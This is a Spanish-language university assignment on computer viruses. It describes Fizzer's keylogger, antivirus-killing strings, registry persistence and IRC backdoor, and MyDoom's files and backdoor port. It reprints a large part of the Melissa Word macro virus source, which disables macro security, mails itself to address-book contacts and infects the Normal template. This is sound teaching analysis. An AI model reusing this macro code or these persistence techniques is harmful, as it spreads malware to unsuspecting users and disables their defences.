Scribd Logo
Cargar

¡Te damos la bienvenida a Scribd!

  • Virologia I Eje 2 PDF

    Cargado por

    Sandra Gómez Tovar
    6 vistas12 páginas
    bien

    Título original

    483562359 Virologia I Eje 2 PDF

    Derechos de autor

    © © All Rights Reserved

    Formatos disponibles

    PDF, TXT o lea en línea desde Scribd

    ¿Le pareció útil este documento?

    ¿Este contenido es inapropiado?

    Denunciar este documento
    bien

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    6 vistas12 páginas

    Virologia I Eje 2 PDF

    Cargado por

    Sandra Gómez Tovar
    bien

    Copyright:

    © All Rights Reserved
    Descargue como PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    de 12

    VIROLOGIA 1

    Estructura de virus Informáticos


    Actividad evaluativa Eje 2

    DOCENTE

    Juan Jose Cruz

    INTEGRANTES
    Jorge Leonardo Gonzalez Moscoso-041
    Juan Pablo Beltran-041

    Fundación Universitaria del Área Andina


    Facultad de Ingeniería de Sistemas
    Agosto 2020
    VIROLOGIA 2

    INTRODUCCIÓN

    Es importante comprender y conocer los conceptos sobre los diferentes virus


    informáticos,cómo identificarlos , analizarlos y gestionarlos así determinar su
    funcionalidad , su clasificación, también tener presente las herramientas y
    procedimientos de protección que requieren los sistemas informáticos para la detección
    prevención, mitigación y eliminación de códigos maliciosos para así su debida y ágil
    gestión para que no afecte nuestros datos .
    VIROLOGIA 3

    CUERPO DEL TRABAJO

    Escoger un virus analizar y estudiar:

    Estudiante: Juan Pablo Beltran.

    Tipo de virus: Fizzer

    Fizzer​ produce los siguientes efectos en el ordenador afectado:

    ● Captura las pulsaciones de teclado que realiza el usuario. ​Fizzer​ guarda estas

    pulsaciones en un fichero de texto que él mismo ha creado en el directorio de

    Windows, llamado ISERVC.KLG. Después lo encripta. Si un ​hacker​ consigue este

    fichero, tendrá acceso a datos confidenciales del usuario del ordenador afectado,

    como pueden ser claves de acceso a servicios de Internet, cuentas bancarias, etc.

    ● Está preparado para finalizar procesos activos. Con ello, algunos programas dejarían

    de funcionar. Estos procesos pertenecen, principalmente, a programas antivirus. Para

    ello, busca y finaliza los procesos activos entre cuyo nombre se encuentre alguna de

    las siguientes cadenas de texto:

    NAV, SCAN, AVP, TASKM, VIRUS, F-PROT, VSHW, ANTIV, VSS, NMAIN.

    ● Actúa como un troyano de tipo ​backdoor​, permitiendo que un ​hacker​, de manera

    remota, gane acceso a los recursos del ordenador afectado.


    VIROLOGIA 4

    Método de Infección

    Fizzer​ crea los siguientes ficheros en el directorio de Windows:

    ● INITBAK.DAT y ISERVC.EXE, que son copias del gusano.

    ● ISERVC.DLL y PROGOP.EXE. Son ficheros que ​Fizzer​ necesita para su correcto

    funcionamiento.

    Además, ​Fizzer​ crea otra copia en el directorio de ficheros temporales de Windows, con

    el nombre ISERVC.EXE.

    Fizzer​ crea las siguientes claves en el Registro de Windows:

    ● HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ Run

    SystemInit = % Windir% \ ISERVC.EXE

    Con esta clave, ​Fizzer​ consigue ejecutarse cada vez que se inicie el sistema.

    ● HKEY_CLASSES_ROOT\ txtfile\ shell\ open\ command

    "(Predeterminado)" = C:\ WINDOWS\ ProgOp.exe 0 7 'C:\ WINDOWS\

    NOTEPAD.EXE %1' 'C:\ WINDOWS\ initbak.dat' 'C:\ WINDOWS\ ISERVC.EXE'

    Con esta clave, el gusano consigue ejecutarse cada vez que el usuario abra un fichero

    de texto.

    Para actuar como un troyano de tipo backdoor, Fizzer sigue el siguiente proceso:

    ● Se conecta a unos determinados servidores de IRC. Si quiere ver una lista de los

    posibles servidores a los que Fizzer se conecta pulse aquí.

    ● Cuando establece esta conexión, entra en un canal determinado y espera a conectarse

    con un cliente de acceso remoto.


    VIROLOGIA 5

    ● Cuando esta conexión se produce, el cliente de acceso remoto consigue acceso a los

    recursos del ordenador afectado de manera remota.

    Método de Propagación

    Fizzer​ se propaga principalmente a través de correo electrónico y de KaZaA, un

    programa de intercambio de ficheros punto a punto (P2P).

    1- Propagación a través del correo electrónico:

    Cuando infecta un ordenador, utiliza su propio motor SMTP para enviar por correo

    electrónico una copia de sí mismo a los siguientes destinatarios:

    ● A todos los contactos que encuentre en la​ ​ ​Libreta de direcciones ​ de Outlook y

    Windows (fichero WAB ).

    ● A destinatarios con nombres aleatorios y alguno de los siguientes dominios:

    msn.com, hotmail.com, yahoo.com, aol.com, earthlink.net, gte.net, juno.com o

    netzero.com.

    Otros Detalles

    Para que conozca un poco mejor a Fizzer, aquí le presentamos alguna de sus

    características:

    ● Está escrito en lenguaje de programación C.

    ● El fichero ejecutable que contiene al gusano incluye una sección de recursos de al

    menos 120 KB con una copia encriptada del fichero ISERVC.EXE.

    ● En la sección de recursos se incluyen dos entradas identificativas del gusano. Esto

    puede verse fácilmente dentro de las propiedades del ejecutable, en el apartado


    VIROLOGIA 6

    “​Versión”​ , el elemento “​Comentarios”​ contiene la cadena: ​This is a system

    initialization utility and is necessary for system stability.​ En el apartado ​Nombre

    Interno​, incluye la cadena ​lservc.exe​.

    Fizzer posee la capacidad de actualizarse bajando parches de una página web hospedada

    en Geocities.

    Estudiante: Jorge Leonardo Gonzalez Moscoso

    Tipo de virus: My Doom

    My Doom ​ produce los siguientes efectos en el ordenador afectado:

    Es un virus de tipo Gusano que se propaga facil y velozmente por correo electrónico y la
    red . fue detectado el 26 de enero del 2004 y a pocas horas se reportaron miles de
    usuarios infectados.

    El mensaje suele pesar entre 30 35 KB, siempre con remitente falso,son los adjuntos
    utiliza las siguientes extensiones

    .bat

    .cmd

    .exe

    .pif

    Cuando se ejecuta , abre el bloc de notas y muestra caracteres sin sentido, realiza ataques

    de denegación del servicio, el gusano abre una puerta trasera por el puerto TCP/3176.

    Cuando se ejecuta, crea los siguientes archivos en el sistema infectado:


    VIROLOGIA 7

    \TEMP\Message

    c:\windows\system\shimgapi.dll

    c:\windows\system\taskmon.exe

    Herramientas de limpieza automática :

    ● Future Time

    ● Panda Software

    ● Utilidad CLRAV de Kaspersky

    También se recomienda utilizar un programa de tipo firewall como ZoneAlarm el

    cuál detendrá y advertirá de cualquier virus de este tipo y troyanos, deshabilitar las

    carpetas compartidas , actualizar su antivirus con las últimas ediciones .

    Parte II

    1. Identifiquen y analicen la siguiente estructura de código. Resuelvan: ¿nombre del virus?


    ¿Qué tipo de virus es? ¿Qué hace el virus? ¿Cuál es el lenguaje utilizado?

    Private Sub AutoOpen()

    On Error Resume Next

    p$ = "clone"

    If System.PrivateProfileString("",
    "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
    "Level") <> ""

    Then

    CommandBars("Macro").Controls("Security...").Enabled = False
    VIROLOGIA 8

    System.PrivateProfileString("",
    "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
    "Level") = 1&

    Else

    p$ = "clone"

    CommandBars("Tools").Controls("Macro").Enabled = False

    Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):


    Options.SaveNormalPrompt = (1 - 1)

    End If

    Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice

    Set UngaDasOutlook = CreateObject("Outlook.Application")

    Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")

    If System.PrivateProfileString("",
    "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by
    Kwyjibo"

    Then

    If UngaDasOutlook = "Outlook" Then

    DasMapiName.Logon "profile", "password"

    For y = 1 To DasMapiName.AddressLists.Count

    Set AddyBook = DasMapiName.AddressLists(y)

    x=1

    Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)

    For oo = 1 To AddyBook.AddressEntries.Count

    Peep = AddyBook.AddressEntries(x)

    BreakUmOffASlice.Recipients.Add Peep

    x=x+1
    VIROLOGIA 9

    If x > 50 Then oo = AddyBook.AddressEntries.Count

    Next oo

    BreakUmOffASlice.Subject = "Important Message From " & Application.UserName

    BreakUmOffASlice.Body = "Here is that document you asked for ... don't

    show anyone else ;-)"

    BreakUmOffASlice.Attachments.Add ActiveDocument.FullName

    BreakUmOffASlice.Send

    Peep = ""

    Next y

    DasMapiName.Logoff

    End If

    p$ = "clone"

    System.PrivateProfileString("",
    "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by
    Kwyjibo"

    End If

    Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)

    Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)

    NTCL = NTI1.CodeModule.CountOfLines

    ADCL = ADI1.CodeModule.CountOfLines

    BGN = 2

    If ADI1.Name <> "Melissa" Then

    If ADCL > 0 Then _

    ADI1.CodeModule.DeleteLines 1, ADCL

    Set ToInfect = ADI1


    VIROLOGIA 10

    ADI1.Name = "Melissa"

    DoAD = True

    End If

    If NTI1.Name <> "Melissa" Then

    If NTCL > 0 Then _

    NTI1.CodeModule.DeleteLines 1, NTCL

    1. ¿Nombre de Virus?

    Melissa

    2. ¿Qué tipo de virus es?

    Un gusano

    3. ¿Que hace el virus?

    Generaba un mensaje que se mandaba a los primeros 50 nombres de la libreta de


    direcciones del usuario infectado.

    Cada una de esas personas recibía un mensaje con el asunto: ​«​Important message
    from​»​ (​Mensaje importante de...)​ y el nombre del archivo infectado. El cuerpo
    del mensaje consistía en el texto ​«​Here is that document you asked for... don't
    show anyone else ;-)​»​ (​Aquí está el documento que pediste... no se lo enseñes a
    nadie más)​ . A continuación adjuntaba el documento ​Word activo​ y envía el
    mensaje.

    Mediante dicho mensaje el autor pretendía hacer creer que el archivo adjunto era de
    total confianza. Esta técnica de ingeniería social había sido empleada por muchos
    virus. El usuario que recibía el documento o archivo lo habría tranquilamente y se
    infectaba.

    4. ¿Cual es el lenguaje utilizado?

    Visual Basic Script (VBS).


    VIROLOGIA 11

    CONCLUSIONES

    La funcionalidad de los virus ha cambiado con el pasar del tiempo y los intereses de sus

    creadores , por esto es de vital importancia estar capacitados en cómo reaccionar ante

    cualquier tipo de ataque, sin embargo no olvidar y tener en cuenta lo más básico que es

    tener nuestro antivirus actualizados , revisar con cuidado que correos y sitios por los que

    navegamos, tener en cuenta que dispositivos conectamos al ordenador.

    Hoy en día los virus nos ha mostrado que se deben combatir dia a dia, con el solo hecho

    de manejar un dispositivo ya se está expuesto a estos ataques con internet o sin internet,

    ya que los hackers lo que buscan es poder activar el virus de cualquier forma para poder

    llegar a su objetivo.
    VIROLOGIA 12

    ​BIBLIOGRAFÍA

    Autor: Panda
    Url: ​https://www.pandasecurity.com/es/security-info/39588/information/Fizzer

    Autor: Glosariolt.com
    Url:​ ​https://www.glosarioit.com/virus/Melissa.html

    Autor: Vsantivirus
    http://www.vsantivirus.com/mydoom-a.htm

    Autor: f-secure.com
    https://www.f-secure.com/v-descs/novarg.shtml

    También podría gustarte